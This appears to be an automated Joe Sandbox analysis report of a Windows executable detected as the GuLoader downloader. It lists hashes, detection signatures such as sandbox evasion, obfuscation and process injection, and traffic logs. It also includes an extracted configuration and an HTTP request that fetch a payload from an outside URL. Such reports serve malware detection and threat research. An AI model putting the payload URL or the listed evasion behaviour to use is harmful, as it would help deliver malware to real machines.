Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.W32.AIDetect.malware2.5627.exe

Overview

General Information

Sample Name:SecuriteInfo.com.W32.AIDetect.malware2.5627.exe
Analysis ID:634994
MD5:7f369d460c84146944c3c12bf83901af
SHA1:29ea3441429d555ddfd0fd8d5973aab0f9ea2663
SHA256:a5e095edbdf743431c5e866c01c3a592fc5a7ddf6bfb617d72f81181743adf3a
Infos:

Detection

GuLoader
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Yara detected GuLoader
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
PE file contains executable resources (Code or Archives)
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
PE file does not import any functions
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Contains functionality to enumerate device drivers
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64native
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://hustlecreate.com/a1/binned_SsGEV34.bin"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.206448386492.0000000002A5B000.00000040.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000004.00000000.205790119879.0000000001660000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

      Sigma Signatures

      No Sigma rule has matched

      Snort Signatures

      No Snort rule has matched

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Found malware configuration
      Source: 00000002.00000002.206448386492.0000000002A5B000.00000040.00000800.00020000.00000000.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://hustlecreate.com/a1/binned_SsGEV34.bin"}
      Multi AV Scanner detection for submitted file
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exeVirustotal: Detection: 19%Perma Link
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exeReversingLabs: Detection: 12%
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Hardheartedly12Jump to behavior
      Source: unknownHTTPS traffic detected: 69.49.244.14:443 -> 192.168.11.20:49764 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 69.49.244.14:443 -> 192.168.11.20:49764 version: TLS 1.2
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
      Source: Binary string: mshtml.pdb source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000001.205793066847.0000000000649000.00000008.00000001.01000000.00000005.sdmp
      Source: Binary string: System.Runtime.CompilerServices.VisualC.ni.pdb source: System.Runtime.CompilerServices.VisualC.dll.2.dr
      Source: Binary string: wntdll.pdbUGP source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000003.205922259478.000000001D44C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000003.205929254527.000000001D5F3000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000003.205922259478.000000001D44C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000003.205929254527.000000001D5F3000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmp
      Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.CompilerServices.VisualC\net6.0-Release\System.Runtime.CompilerServices.VisualC.pdb source: System.Runtime.CompilerServices.VisualC.dll.2.dr
      Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.CompilerServices.VisualC\net6.0-Release\System.Runtime.CompilerServices.VisualC.pdbRSDS source: System.Runtime.CompilerServices.VisualC.dll.2.dr
      Source: Binary string: mshtml.pdbUGP source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000001.205793066847.0000000000649000.00000008.00000001.01000000.00000005.sdmp
      Source: Binary string: d:\build\ob\bora-18379147\bora-vmsoft\build\release-x64\svga\wddm\src\coinstaller\Win8Release\x64\bin\vm3dc003.pdb source: vm3dc003.dll.2.dr
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,2_2_00405C49
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_00406873 FindFirstFileW,FindClose,2_2_00406873
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_0040290B FindFirstFileW,2_2_0040290B

      Networking

      barindex
      C2 URLs / IPs found in malware configuration
      Source: Malware configuration extractorURLs: https://hustlecreate.com/a1/binned_SsGEV34.bin
      Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: global trafficHTTP traffic detected: GET /a1/binned_SsGEV34.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: hustlecreate.comCache-Control: no-cache
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: vm3dc003.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
      Source: vm3dc003.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vm3dc003.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000003.205924860705.00000000019B0000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000003.205926637739.00000000019B3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000003.205921193564.00000000019B6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210649904361.00000000019B6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000003.205926200904.00000000019B0000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000003.205925287313.00000000019B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vm3dc003.dll.2.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vm3dc003.dll.2.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vm3dc003.dll.2.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000003.205924860705.00000000019B0000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000003.205926637739.00000000019B3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000003.205921193564.00000000019B6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210649904361.00000000019B6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000003.205926200904.00000000019B0000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000003.205925287313.00000000019B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: vm3dc003.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
      Source: vm3dc003.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
      Source: vm3dc003.dll.2.drString found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vm3dc003.dll.2.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
      Source: vm3dc003.dll.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
      Source: vm3dc003.dll.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
      Source: vm3dc003.dll.2.drString found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vm3dc003.dll.2.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000001.205793066847.0000000000649000.00000008.00000001.01000000.00000005.sdmpString found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, uninstalla.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: vm3dc003.dll.2.drString found in binary or memory: http://ocsp.digicert.com0C
      Source: vm3dc003.dll.2.drString found in binary or memory: http://ocsp.digicert.com0L
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vm3dc003.dll.2.drString found in binary or memory: http://ocsp.digicert.com0O
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vm3dc003.dll.2.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vm3dc003.dll.2.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vm3dc003.dll.2.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vm3dc003.dll.2.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vm3dc003.dll.2.drString found in binary or memory: http://s2.symcb.com0
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vm3dc003.dll.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vm3dc003.dll.2.drString found in binary or memory: http://sv.symcb.com/sv.crl0a
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vm3dc003.dll.2.drString found in binary or memory: http://sv.symcb.com/sv.crt0
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vm3dc003.dll.2.drString found in binary or memory: http://sv.symcd.com0&
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vm3dc003.dll.2.drString found in binary or memory: http://www.digicert.com/CPS0
      Source: vm3dc003.dll.2.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000001.205793066847.0000000000649000.00000008.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000001.205792807270.0000000000626000.00000008.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vm3dc003.dll.2.drString found in binary or memory: http://www.symauth.com/cps0(
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vm3dc003.dll.2.drString found in binary or memory: http://www.symauth.com/rpa00
      Source: vm3dc003.dll.2.drString found in binary or memory: http://www.vmware.com/0
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vm3dc003.dll.2.drString found in binary or memory: http://www.vmware.com/0/
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000001.205792493541.00000000005F2000.00000008.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000001.205792493541.00000000005F2000.00000008.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vm3dc003.dll.2.drString found in binary or memory: https://d.symcb.com/cps0%
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vm3dc003.dll.2.drString found in binary or memory: https://d.symcb.com/rpa0
      Source: System.Runtime.CompilerServices.VisualC.dll.2.drString found in binary or memory: https://github.com/dotnet/runtime
      Source: System.Runtime.CompilerServices.VisualC.dll.2.drString found in binary or memory: https://github.com/dotnet/runtimeBSJB
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210649574538.0000000001978000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210649475257.0000000001964000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hustlecreate.com/
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210649574538.0000000001978000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hustlecreate.com/a1/binned_SsGEV34.bin
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210649574538.0000000001978000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hustlecreate.com/a1/binned_SsGEV34.bin42
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210649574538.0000000001978000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hustlecreate.com/a1/binned_SsGEV34.binY
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000001.205793066847.0000000000649000.00000008.00000001.01000000.00000005.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
      Source: vm3dc003.dll.2.drString found in binary or memory: https://www.digicert.com/CPS0
      Source: vm3dc003.dll.2.drString found in binary or memory: https://www.globalsign.com/repository/0
      Source: unknownDNS traffic detected: queries for: hustlecreate.com
      Source: global trafficHTTP traffic detected: GET /a1/binned_SsGEV34.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: hustlecreate.comCache-Control: no-cache
      Source: unknownHTTPS traffic detected: 69.49.244.14:443 -> 192.168.11.20:49764 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 69.49.244.14:443 -> 192.168.11.20:49764 version: TLS 1.2
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,2_2_004056DE
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,2_2_0040352D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_0040755C2_2_0040755C
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_00406D852_2_00406D85
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_713C1BFF2_2_713C1BFF
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_02AB9DB72_2_02AB9DB7
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_02AB82A12_2_02AB82A1
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_02AAECBE2_2_02AAECBE
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_02ABCAB02_2_02ABCAB0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_02AAEECD2_2_02AAEECD
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_02AAEC232_2_02AAEC23
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_02AAEE0E2_2_02AAEE0E
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_02AAEC6A2_2_02AAEC6A
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_02AAF0472_2_02AAF047
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_02AAEFFF2_2_02AAEFFF
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_02AB292D2_2_02AB292D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_02ABAF382_2_02ABAF38
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_02AAEF792_2_02AAEF79
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_02AAE5732_2_02AAE573
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_02AAED772_2_02AAED77
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_02ABAB402_2_02ABAB40
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_02AB97582_2_02AB9758
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E0D694_2_1D7E0D69
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D87FDF44_2_1D87FDF4
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7DAD004_2_1D7DAD00
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E9DD04_2_1D7E9DD0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D89FD274_2_1D89FD27
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D897D4C4_2_1D897D4C
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7F2DB04_2_1D7F2DB0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E3C604_2_1D7E3C60
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D879C984_2_1D879C98
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7EAC204_2_1D7EAC20
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D8AACEB4_2_1D8AACEB
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D0C124_2_1D7D0C12
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7FFCE04_2_1D7FFCE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7F8CDF4_2_1D7F8CDF
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D88EC4C4_2_1D88EC4C
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D896C694_2_1D896C69
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D89EC604_2_1D89EC60
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D89EFBF4_2_1D89EFBF
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D891FC64_2_1D891FC6
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7ECF004_2_1D7ECF00
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E6FE04_2_1D7E6FE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D89FF634_2_1D89FF63
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D890EAD4_2_1D890EAD
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D899ED24_2_1D899ED2
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D2EE84_2_1D7D2EE8
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E1EB24_2_1D7E1EB2
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D800E504_2_1D800E50
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D880E6D4_2_1D880E6D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D89E9A64_2_1D89E9A6
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D8259C04_2_1D8259C0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7A99E84_2_1D7A99E8
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7DE9A04_2_1D7DE9A0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E98704_2_1D7E9870
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7FB8704_2_1D7FB870
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7C68684_2_1D7C6868
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D8598B24_2_1D8598B2
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D8918DA4_2_1D8918DA
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D8978F34_2_1D8978F3
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E38004_2_1D7E3800
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D80E8104_2_1D80E810
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D8808354_2_1D880835
